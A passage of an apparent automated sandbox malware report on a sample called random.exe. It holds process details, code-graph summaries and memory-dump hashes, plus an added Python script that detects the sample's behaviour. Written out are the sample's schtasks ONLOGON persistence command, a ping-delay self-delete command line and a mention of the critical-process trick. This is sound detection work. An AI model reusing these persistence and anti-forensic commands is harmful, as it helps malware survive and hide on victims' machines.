                          Wow64 process (32bit):true
                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                          Imagebase:0x3c0000
                          File size:18'944 bytes
                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true
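The process list above documents the persistence and cleanup chain in this run: random.exe registers an ONLOGON scheduled task pointing at its own Desktop path, a same-hash copy starts from %AppData%\Roaming\cEp3d38.exe, and cmd.exe is spawned to wait on a single ping before deleting the original. The following is an added example, not part of the report, that runs detection rules for those three behaviours over the command lines transcribed from the list; the ids are the report's Target IDs, while the rule names, severities and the user-writable-path heuristic are mine.

```python
import re
from typing import Dict, List

# Command lines transcribed from the process list above (Target IDs 1, 3, 5, 12, 13, 15).
PROCESSES: List[Dict[str, object]] = [
    {"id": 1, "path": r"C:\Users\user\Desktop\random.exe",
     "cmdline": r'"C:\Users\user\Desktop\random.exe"'},
    {"id": 3, "path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F'},
    {"id": 5, "path": r"C:\Users\user\Desktop\random.exe",
     "cmdline": r"C:\Users\user\Desktop\random.exe"},
    {"id": 12, "path": r"C:\Users\user\AppData\Roaming\cEp3d38.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\cEp3d38.exe"'},
    {"id": 13, "path": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"'},
    {"id": 15, "path": r"C:\Windows\SysWOW64\PING.EXE",
     "cmdline": r"ping 1.1.1.1 -n 1 -w 4000"},
]

# Paths a non-admin user can write to; a task that runs from one is the usual malware shape.
USER_WRITABLE = re.compile(r"\\Users\\|\\ProgramData\\|\\Temp\\", re.IGNORECASE)
# schtasks /Create with its schedule and the /TR target (quoted or bare).
SCHTASKS_CREATE = re.compile(
    r'schtasks(?:\.exe)?"?\s+/create\b.*?/sc\s+(?P<sched>\S+).*?/tr\s+"?(?P<target>[^"]+)"?',
    re.IGNORECASE)
# ping used as a timer (-n <count>) chained with del: the classic self-delete one-liner.
PING_THEN_DEL = re.compile(
    r'ping\s+(?P<host>\S+)\s.*?-n\s+\d+.*?&\s*del\s+"?(?P<target>[^"]+)"?',
    re.IGNORECASE)
# An .exe sitting directly in the AppData root rather than in a vendor subfolder.
APPDATA_ROOT_EXE = re.compile(r"\\AppData\\(?:Roaming|Local)\\[^\\]+\.exe$", re.IGNORECASE)


def scan(processes: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Apply the three rules and one cross-process correlation; returns one dict per finding."""
    findings: List[Dict[str, object]] = []
    persist_targets: Dict[str, int] = {}  # lower-cased /TR path -> id of the schtasks process
    deleted: Dict[str, int] = {}          # lower-cased deleted path -> id of the cmd process
    for p in processes:
        cmd, pid = str(p["cmdline"]), int(p["id"])
        m = SCHTASKS_CREATE.search(cmd)
        if m:
            target = m.group("target").strip()
            persist_targets[target.lower()] = pid
            findings.append({"id": pid, "rule": "schtasks_persistence",
                             "severity": "high" if USER_WRITABLE.search(target) else "medium",
                             "target": target,
                             "detail": f"/SC {m.group('sched').upper()} task runs {target}"})
        m = PING_THEN_DEL.search(cmd)
        if m:
            target = m.group("target").strip()
            deleted[target.lower()] = pid
            findings.append({"id": pid, "rule": "self_delete_via_ping", "severity": "high",
                             "target": target,
                             "detail": f"ping {m.group('host')} used as a delay before Del {target}"})
        if APPDATA_ROOT_EXE.search(str(p["path"])):
            findings.append({"id": pid, "rule": "appdata_root_executable", "severity": "medium",
                             "target": p["path"],
                             "detail": "executable launched directly from the AppData root"})
    # Correlation: the persistence target is the very file the chain deletes afterwards.
    for path, pid in deleted.items():
        if path in persist_targets:
            findings.append({"id": pid, "rule": "persistence_target_deleted", "severity": "info",
                             "target": path,
                             "detail": f"task created by target {persist_targets[path]} "
                                       f"points at a path this process deletes"})
    return findings


if __name__ == "__main__":
    for f in scan(PROCESSES):
        print(f"[{f['severity']:>6}] target {f['id']:>2} {f['rule']}: {f['detail']}")
```

The correlation rule is worth keeping: the task's /TR points at the same Desktop path that cmd.exe deletes, so the ONLOGON task only works if the bot later restores that file, and nothing in this section of the report shows whether it does.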


                            Execution Graph

                            Execution Coverage:16.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:12
                            Total number of Limit Nodes:0
                            execution_graph (rendered graph; node list not reproduced): 1511e6b → 1511e72 → 553a0f0 / 553a100 → 553a11c → 5537584 → 553a598 RtlSetProcessIsCritical → 553a169 → 1511e9d. RtlSetProcessIsCritical is the only API reached from this entry; it sets the process's BreakOnTermination flag via NtSetInformationProcess, so a later termination of the process causes a bug check, and the call only succeeds when the caller holds SeDebugPrivilege.

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list not reproduced): function 55375d8, basic blocks 55375d8-5537c62; calls 55331b0, 5536e20, 5537148, 5536dd8, 5537190, 5536e68, 5537100 and recurses into 55375d8 / 55375c8.
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: "Ct$"Ct$"Ct$"Ct$"Ct$(;t$^Ct
                            • API String ID: 0-2759278041
                            • Opcode ID: bc4420672530f81f74626477c1f4a9196996adf93425c231b5c67f1c90eb0d77
                            • Instruction ID: 4835a1bb667cd302d08607df8ea171370177f99500f71654ff5a4165d9482992
                            • Opcode Fuzzy Hash: bc4420672530f81f74626477c1f4a9196996adf93425c231b5c67f1c90eb0d77
                            • Instruction Fuzzy Hash: AE124874B102098FDB15DFA8D995A6EBBF6FF8C200B108569D40AAB791DF34ED05CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list not reproduced): function 553f698, basic blocks 553f698-553fba0; no calls, ends in a self-loop at 553fba0.
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: \Vrn
                            • API String ID: 0-2142071343
                            • Opcode ID: 366f145bcd74aaf1ad24169661a11c8aaf7ebd276af4afce99fda3cb97d41020
                            • Instruction ID: 5adaa225b6fd77bc640ff5e8d50ee50195c62ee25342e0e73d54d7c943b83165
                            • Opcode Fuzzy Hash: 366f145bcd74aaf1ad24169661a11c8aaf7ebd276af4afce99fda3cb97d41020
                            • Instruction Fuzzy Hash: 44E1E370D00318DFEB24DFA9C895BDEBBB1BF49300F1085AAD409A7290EB749A85CF55

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list not reproduced): function 151e970, basic blocks 151e970-151ef88; calls 151e6a8, 151f2c8, 151a718, 1519458, 1519dc0 and recurses into 151e970 / 151ec80 / 151eea7 / 151e95f.
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68601f41d8231c098612489ed64aa690cc6a408a18d405c62c9cfb68e939f028
                            • Instruction ID: 03588cafa323983d58da9256337d5f5e36d2d27334b8c9fa9eec282315422727
                            • Opcode Fuzzy Hash: 68601f41d8231c098612489ed64aa690cc6a408a18d405c62c9cfb68e939f028
                            • Instruction Fuzzy Hash: 6C127134B002158FE716DF69C894AAEBBF6FF88710B148569D906EB365DB31DC41CBA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list not reproduced): function 6b54788, basic blocks 6b54788-6b55062; calls 6b5350c, 6b5351c, 6b5352c, 6b5353c, 6b54388, 6b54394, 6b543a0, 6b543ac.
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0948ff67c7a3946ee7570a80a9bad9ccce31cd133557fc7873806c8929de8ee
                            • Instruction ID: 0d43992a7eb2a95baf9003a4cf35632ad41a12ad42e370814544324f6af3b86d
                            • Opcode Fuzzy Hash: b0948ff67c7a3946ee7570a80a9bad9ccce31cd133557fc7873806c8929de8ee
                            • Instruction Fuzzy Hash: 7332B074E01229CFDB68DF65C890BEDBBB2BB89300F1095E9D509AB250DB359E85CF50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list not reproduced): function 6b53918, basic blocks 6b53918-6b5400b; calls 6b540b0 / 6b5429f.
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 413054d075a510b5c8eb931fa7fbf7e8df7550a6bed4b509eb5dc9d2e530d7b2
                            • Instruction ID: 6c6c563f1b3e7d8926513d125b6ee63dea8dc3f42238e9eefbe6e4cc76d37f92
                            • Opcode Fuzzy Hash: 413054d075a510b5c8eb931fa7fbf7e8df7550a6bed4b509eb5dc9d2e530d7b2
                            • Instruction Fuzzy Hash: 770225B4D05268CFEBA4CF65C8447ECBBF5FB49340F1590A9D80AAB251EB755980CF50

                            Control-flow Graph
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 533c2e107b0c14be5a7f9e1e9b68ef24c09e6d5f872d097341fe89c31ce64cba
                            • Instruction ID: f1de0c1be10df3099ac139eec8a2b336ccb4ea74940ec1464a8339f3d3de23b1
                            • Opcode Fuzzy Hash: 533c2e107b0c14be5a7f9e1e9b68ef24c09e6d5f872d097341fe89c31ce64cba
                            • Instruction Fuzzy Hash: 6CF1A371A006099FDB15DFA4D885BAEBBF2FF88314F148569E509EB291DB30EC45CB90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2be9d22fe78bd3c397a4960fbd22c40f758d15f95411ec6eaed308564005a6c8
                            • Instruction ID: 01b9fbb917db4296d6712bf6867273cc65036dc551ed0a57def024387c834da8
                            • Opcode Fuzzy Hash: 2be9d22fe78bd3c397a4960fbd22c40f758d15f95411ec6eaed308564005a6c8
                            • Instruction Fuzzy Hash: E2F1D3B4D00219CFEB60DFA8C885BDDBBF1BF49304F1095AAD809A7250EB749A85CF55
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed77ae0697b3cbd94d8e360bc546535e28536f88e05ff336ab48f584b1a22b60
                            • Instruction ID: c2184db43e1e03dbae4a779c08013210753ae2f5203170fcbbfa3aa45c27aef6
                            • Opcode Fuzzy Hash: ed77ae0697b3cbd94d8e360bc546535e28536f88e05ff336ab48f584b1a22b60
                            • Instruction Fuzzy Hash: 2012B174A01229CFEB25DF64E888B9DBBB2FB49300F1085E9D909A7354DB749E81CF51
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbb6496861854d843418500138ef934591d7f05ee9bd4e54b619d30400ac6488
                            • Instruction ID: 2d2e21348c5057d85e08229d566e3f40b83dd02314c23aa8eaefb45736583d3d
                            • Opcode Fuzzy Hash: fbb6496861854d843418500138ef934591d7f05ee9bd4e54b619d30400ac6488
                            • Instruction Fuzzy Hash: D5F1BD74E002188FEB65DF69D994BDDBBB2FF88300F1081AA9909AB355DB355E81CF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44c8d5401a53144a6b38e74bdf7193644e3cf263e58a1c9498091fde6ce489d3
                            • Instruction ID: eeeef4938b8d8938ed3752a1118937ac3a4211e0eca34ef3b82316eccab4fbf4
                            • Opcode Fuzzy Hash: 44c8d5401a53144a6b38e74bdf7193644e3cf263e58a1c9498091fde6ce489d3
                            • Instruction Fuzzy Hash: 5CA1A274E01218CFDB54DFA9D894A9DBBB2FF89300F2181AAD849AB365DB319845CF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 276d7cd83e3edbbc376e3356ee89f44788e3c59b0fd4adf3ed56c2411f2a36b1
                            • Instruction ID: 1d57431eb341b798626f6a314cf1ae7255e705223e26236aa4c24244c96fefe7
                            • Opcode Fuzzy Hash: 276d7cd83e3edbbc376e3356ee89f44788e3c59b0fd4adf3ed56c2411f2a36b1
                            • Instruction Fuzzy Hash: 48918274E00218CFDB54DFA9D994A9DBBF2FF89300F219169E819AB365DB31A841CF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 199445ac9e436e7a40d697d6138d5c77ba30444c37bae9b0bad119370fe6c4de
                            • Instruction ID: 3d6eefc5df90d88873c0a4663967a8974018bf9ddb1b1511bb49a559a482b5d0
                            • Opcode Fuzzy Hash: 199445ac9e436e7a40d697d6138d5c77ba30444c37bae9b0bad119370fe6c4de
                            • Instruction Fuzzy Hash: BD514F34B102099BD708EBBAD8907AE77F7BFCC740F648428D105AB394DE799C0597A0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16a9596751b826d4b3894e86d7fcab98d06c04853c6fcf24cd62f6b55d13bb5c
                            • Instruction ID: a7c3205be83354ad81c80296c9dce4eb2e54561046b5b028102cabc915d61c5a
                            • Opcode Fuzzy Hash: 16a9596751b826d4b3894e86d7fcab98d06c04853c6fcf24cd62f6b55d13bb5c
                            • Instruction Fuzzy Hash: 13212571D01209DFEB04DFA9D8906EDBBF2BF89310F149629D424BB290DB356941CF64

                            Control-flow Graph
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:<t$09<t$H;<t$Ld<t$:<t
                            • API String ID: 0-3123518023
                            • Opcode ID: 6d66b615b6161dec1649b81c3a75606d29110e2bdecf5cb9a61509344448ad4e
                            • Instruction ID: 8eeaa499d72d3d9eb18923de50ad7a9e1d2d234167a867235033b7e7945f6b11
                            • Opcode Fuzzy Hash: 6d66b615b6161dec1649b81c3a75606d29110e2bdecf5cb9a61509344448ad4e
                            • Instruction Fuzzy Hash: 0D633E70A40219AFEB26AB90CC54BED77B6FF89740F1040E9E6097B2D0CA756E94CF15

                            Control-flow Graph
                            APIs
                            • RtlSetProcessIsCritical.NTDLL(?,?,00000000), ref: 0553A64F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID: m
                            • API String ID: 2695349919-3775001192
                            • Opcode ID: fc0f4dd0da460f4b52c0f6917985706e4eee0fd8ee5d08990f6f3720e5dc53e7
                            • Instruction ID: 6828cfc6ad79f3354402aeb2da40a8c273633286c3f98c2d1359843c3355da2f
                            • Opcode Fuzzy Hash: fc0f4dd0da460f4b52c0f6917985706e4eee0fd8ee5d08990f6f3720e5dc53e7
                            • Instruction Fuzzy Hash: 10415A75C092989FDB01CFA9D841BEEBFF4AF0A310F0480AAE854B7251D3389A45CF65

                            Control-flow Graph
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: 4247860fac2cb94a6fae442f348e1e35b23b62f12dd4678fba15bfa7d2e49f8c
                            • Instruction ID: 3596bc8370df65883193f1aa6d7b787d1445a39f592c318874e55ea6bc6b2078
                            • Opcode Fuzzy Hash: 4247860fac2cb94a6fae442f348e1e35b23b62f12dd4678fba15bfa7d2e49f8c
                            • Instruction Fuzzy Hash: 61029E346006068FE726CF59C480A6AFBF2FF88314B55C669D9599B766DB30FC41CB90

                            Control-flow Graph
                            APIs
                            • RtlSetProcessIsCritical.NTDLL(?,?,00000000), ref: 0553A64F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0
                            • Opcode ID: 84e3262c7d559bd07ec3c59144143e7b6795c38219aea8e26864ab0b2a92c86f
                            • Instruction ID: 5ad41d47471ad9e03e54da6adf86297be9b406c155a91d0541736a3cb6f8af04
                            • Opcode Fuzzy Hash: 84e3262c7d559bd07ec3c59144143e7b6795c38219aea8e26864ab0b2a92c86f
                            • Instruction Fuzzy Hash: 0331D0B5D04258DFDB10CFAAD441AEEFBF5AB09310F14906AE858B7251D338AA45CF64

                            Control-flow Graph
                            APIs
                            • RtlSetProcessIsCritical.NTDLL(?,?,00000000), ref: 0553A64F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0
                            • Opcode ID: 50e55c05c0b46a306dc6f8e85a907737006eb69d56777878f407d8cbea989a7d
                            • Instruction ID: 83e89992ab23ac7b5dc284f228e701a914871ffde68399367fb94525f623cf36
                            • Opcode Fuzzy Hash: 50e55c05c0b46a306dc6f8e85a907737006eb69d56777878f407d8cbea989a7d
                            • Instruction Fuzzy Hash: CE31ABB9D04259CFDB00CFAAD481AEDFBF5AF09310F14906AE858B3251D378AA45DF64

                            Control-flow Graph
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: 7f9fa221a4424576e2bb805f1d3fbbbf0e5e9857493959ad8107ecd6ec6e4d44
                            • Instruction ID: ed30e58fb0fdc21a80fe6e0153d5e3eb25e5de25edd7fb5b488f1dae60f8fb58
                            • Opcode Fuzzy Hash: 7f9fa221a4424576e2bb805f1d3fbbbf0e5e9857493959ad8107ecd6ec6e4d44
                            • Instruction Fuzzy Hash: 15618974A00606CFCB16DF59C5C08AAF7B6FF88314715C669C959AB61ADB30FC51CBA0

                            Control-flow Graph
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4319717edb9ad95bc102d52bc02cb7acc426b990068de4258ab01766327adf6
                            • Instruction ID: ab75c37efef1badb957189aff88a702a24d671c11f529d1e9c4686ba42e9e6f0
                            • Opcode Fuzzy Hash: a4319717edb9ad95bc102d52bc02cb7acc426b990068de4258ab01766327adf6
                            • Instruction Fuzzy Hash: 82E2F734A51219EBEB14EF50EC94BAD7776FF89340F1088A8D90A2B394CB356E85CF51

                            Control-flow Graph
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2386e05268bb4a43624228ddc6c375f2c2e9cffefed890505533738c3d494e07
                            • Instruction ID: 8ad03e99d204ec41e02f8a309401cf66fb820ec9c287f77a06e2b1d23cfc2c4b
                            • Opcode Fuzzy Hash: 2386e05268bb4a43624228ddc6c375f2c2e9cffefed890505533738c3d494e07
                            • Instruction Fuzzy Hash: EB1227747006058FEB16DF29C488A6EBBF2FF89300B1544AAE506DB366DB35EC46CB51
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 89d93bb8c6957e26fc0c13ea1705f6c50f7963348be5288d9893c697439e50e6
                            • Instruction ID: 82d6127e650eac3fc68c9e1bfd00f9f97e3b7e1efcd12966ece98844592e17e5
                            • Opcode Fuzzy Hash: 89d93bb8c6957e26fc0c13ea1705f6c50f7963348be5288d9893c697439e50e6
                            • Instruction Fuzzy Hash: F1F1F4B4D00219CFEB60DFA8C885BDDBBF1BF49304F1095AAD809A7290EB749985CF55
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8fe89fd9e64274fb7fcf488669e1e04b8c4eff118ed4d7c7dedc50dc10f5ac4
                            • Instruction ID: fded66cc1a76c63c452cfca20a3cc32c1148070db548c3f6ff28b083751682aa
                            • Opcode Fuzzy Hash: c8fe89fd9e64274fb7fcf488669e1e04b8c4eff118ed4d7c7dedc50dc10f5ac4
                            • Instruction Fuzzy Hash: 68A12E315093418FE313DB34D8946AA7BF2FF96220749499BC085CF3A6DB34AD0AC752
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d783146427f4685decf928b295b7b425ca6bdbef2b0c8d12b665b0a104ac1b6
                            • Instruction ID: 90dededc20f4f0ae7e9c0a8411f3d80eabc18ce40b0f3e2641a17313102ae6d8
                            • Opcode Fuzzy Hash: 4d783146427f4685decf928b295b7b425ca6bdbef2b0c8d12b665b0a104ac1b6
                            • Instruction Fuzzy Hash: 03A15A746003029FC715EF64D8849AEB7F2FF89310B158A98D44A9B766DB30FD4ACB91
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 371c4a385db32a2d611760f273d655323226087647d90d119fc44ff1ab556f2b
                            • Instruction ID: 4db35ca8f3f48249c76cc242a4591333860ac70e3cb593e86af3b5f16eb22aa9
                            • Opcode Fuzzy Hash: 371c4a385db32a2d611760f273d655323226087647d90d119fc44ff1ab556f2b
                            • Instruction Fuzzy Hash: 67A159746003069FC715EF64D4849AAB7F2FF88310B148A98D44A9B766DB30FD4ACB91
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f2093e102229c46629f4110bf0839076b1b98a16b806766b3c470fbcad3e6b9
                            • Instruction ID: 88ef08475f9db76dcd6169282117339f4034d511e3e44acd99f4cc71adb4ccad
                            • Opcode Fuzzy Hash: 5f2093e102229c46629f4110bf0839076b1b98a16b806766b3c470fbcad3e6b9
                            • Instruction Fuzzy Hash: 4191D874E15248CFDB55CFA9D494A9DBBF2BF4A300F2591AAD805AB366DB319C01CF10
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9e82e7162903f55b136a39618f6a19478b3a1fda55b5a618d59276b75ec1dcd
                            • Instruction ID: d53d4e4f4eb10bb00ed9b5f69467d2da1965904313bd23057099d144c2d05555
                            • Opcode Fuzzy Hash: a9e82e7162903f55b136a39618f6a19478b3a1fda55b5a618d59276b75ec1dcd
                            • Instruction Fuzzy Hash: 2FA18174E01219DFEB64DF64E858BADBBB2FB88300F1085A9D90A67394DB345E85CF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6b9caf994eecb8eb64297cb0bb2a7d1ba976e8ac2f3edd3536d3e3201a7c78f
                            • Instruction ID: 5561017ee3c4760b0da44b8c22e4c594d102d14f288964958d74f7ea4b369d9f
                            • Opcode Fuzzy Hash: b6b9caf994eecb8eb64297cb0bb2a7d1ba976e8ac2f3edd3536d3e3201a7c78f
                            • Instruction Fuzzy Hash: CE915074E00218CFDB54DFA9D994A9DBBF2BF89300F219169E819AB365DB31A841CF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35e51c486abf606ebc74f6abca205696feb4274a13cb1e406ceb4a0abd0c1b83
                            • Instruction ID: a9bcfb3fc8b9450686de78e733debd58ac6c09b9c8248800e233f6c95e5aab56
                            • Opcode Fuzzy Hash: 35e51c486abf606ebc74f6abca205696feb4274a13cb1e406ceb4a0abd0c1b83
                            • Instruction Fuzzy Hash: 93A18474A01219DFEB64DF64E898BADBBB2FB48300F1085A9D90E67354DB34AD81CF50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
